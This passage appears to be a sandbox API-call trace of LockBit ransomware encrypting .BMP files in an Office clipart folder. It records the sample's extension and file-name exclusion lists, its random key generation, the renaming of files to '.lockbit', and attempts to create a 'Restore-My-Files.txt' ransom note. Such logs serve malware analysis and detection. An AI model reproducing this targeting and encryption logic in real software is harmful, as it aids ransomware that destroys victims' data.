1 [0169.077] lstrcmpiW (lpString1=".", lpString2="PH02417U.BMP") returned -1 [0169.077] lstrcmpiW (lpString1="..", lpString2="PH02417U.BMP") returned -1 [0169.077] PathFindExtensionW (pszPath="PH02417U.BMP") returned=".BMP" [0169.077] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.077] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.077] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.077] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.077] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.078] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.078] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.078] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02417U.BMP") returned 1 [0169.079] lstrcmpiW (lpString1="ntldr", lpString2="PH02417U.BMP") returned -1 [0169.079] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02417U.BMP") returned -1 [0169.079] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02417U.BMP") returned -1 [0169.079] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02417U.BMP") returned -1 [0169.079] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02417U.BMP") returned 1 [0169.079] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02417U.BMP") returned -1 [0169.079] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.079] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP") returned=".BMP" [0169.079] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.079] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.079] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.080] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.080] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP.lockbit") returned 72 [0169.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02417u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.081] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.081] malloc (_Size=0x40068) returned 0x1ff1e60 [0169.081] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31968) returned 1 [0169.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0169.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0169.082] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.086] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.086] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.086] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.088] free (_Block=0x1fa2ed8) [0169.088] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.088] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.088] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.088] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf783f00, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf783f00, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7c08, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02466U.BMP", cAlternateFileName="")) returned 1 [0169.088] lstrcmpiW (lpString1=".", lpString2="PH02466U.BMP") returned -1 [0169.088] lstrcmpiW (lpString1="..", lpString2="PH02466U.BMP") returned -1 [0169.088] PathFindExtensionW (pszPath="PH02466U.BMP") returned=".BMP" [0169.088] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.088] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.088] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.088] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.088] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.089] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.089] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.089] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02466U.BMP") returned 1 [0169.090] lstrcmpiW (lpString1="ntldr", lpString2="PH02466U.BMP") returned -1 [0169.090] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02466U.BMP") returned -1 [0169.090] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02466U.BMP") returned -1 [0169.090] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02466U.BMP") returned -1 [0169.090] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02466U.BMP") returned 1 [0169.090] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02466U.BMP") returned -1 [0169.090] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.090] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP") returned=".BMP" [0169.090] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.090] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.090] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.091] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.091] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP.lockbit") returned 72 [0169.091] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02466u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0169.092] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.092] malloc (_Size=0x40068) returned 0x3df0008 [0169.092] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31752) returned 1 [0169.092] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.093] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.093] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.093] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.093] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.098] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.098] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.098] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.099] free (_Block=0x1fa2ed8) [0169.099] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.099] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.099] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78519700, ftCreationTime.dwHighDateTime=0x1bf111d, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78519700, ftLastWriteTime.dwHighDateTime=0x1bf111d, nFileSizeHigh=0x0, nFileSizeLow=0x48fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02470U.BMP", cAlternateFileName="")) returned 1 [0169.099] lstrcmpiW (lpString1=".", lpString2="PH02470U.BMP") returned -1 [0169.099] lstrcmpiW (lpString1="..", lpString2="PH02470U.BMP") returned -1 [0169.099] PathFindExtensionW (pszPath="PH02470U.BMP") returned=".BMP" [0169.100] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.100] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.100] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.100] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.100] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.100] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.101] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.101] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02470U.BMP") returned 1 [0169.101] lstrcmpiW (lpString1="ntldr", lpString2="PH02470U.BMP") returned -1 [0169.101] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02470U.BMP") returned -1 [0169.101] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02470U.BMP") returned -1 [0169.101] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02470U.BMP") returned -1 [0169.101] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02470U.BMP") returned 1 [0169.102] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02470U.BMP") returned -1 [0169.102] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.102] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP") returned=".BMP" [0169.102] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.102] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.102] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.103] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.103] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.103] 